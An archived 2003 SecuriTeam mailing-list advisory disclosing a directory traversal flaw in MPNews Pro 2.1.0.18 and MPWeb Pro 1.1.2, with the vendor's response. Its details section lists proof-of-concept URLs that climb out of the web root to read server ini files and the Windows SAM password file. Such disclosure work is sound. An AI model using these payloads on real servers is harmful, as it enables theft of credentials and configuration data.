[NT] Mutantpenguin's MPNews and MPWeb Directory Traversal Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 10/07/03
- Previous message: SecuriTeam: "[NT] Cumulative Patch for Internet Explorer (MS03-040)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 7 Oct 2003 18:12:04 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mutantpenguin's MPNews and MPWeb Directory Traversal Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.mutantpenguin.co.uk/mpnewspro/> MPNews PRO is "a news server
for Windows that allows you to create news groups on your own computer. It
is more fully-featured than the standard, free version. MPNews PRO is
exceptionally easy to configure and run."
<http://www.mutantpenguin.co.uk/mpwebpro/> MPWeb PRO is "a web server for
Windows that allows you to host web sites on your own computer. It is more
fully-featured than the standard, free version."
Both MPNews Server and MPWeb suffer from a directory traversal
vulnerability, the vulnerability allows a remote attacker to break out of
the web root and read arbitrary files from the server.
DETAILS
Vulnerable Systems:
* MPNews Pro version 2.1.0.18
* MPWeb Pro version 1.1.2
MPNews Pro Directory traversal
http://localhost:81/./.././../mpnews.ini
MPWeb Pro Directory traversal
http://localhost/./../mpweb.ini
http://localhost/./.././.././../winnt/repair/sam
Vendor Status:
Date of Vendor Notification: 01/10/03
Vendor response:
"Hi,
Thanks a lot for pointing these out to us. We are currently developing
fixes which should be released in the next few days."
ADDITIONAL INFORMATION
The information has been provided by <mailto:gs_lab@yahoo.com> Gama Sec
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Cumulative Patch for Internet Explorer (MS03-040)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
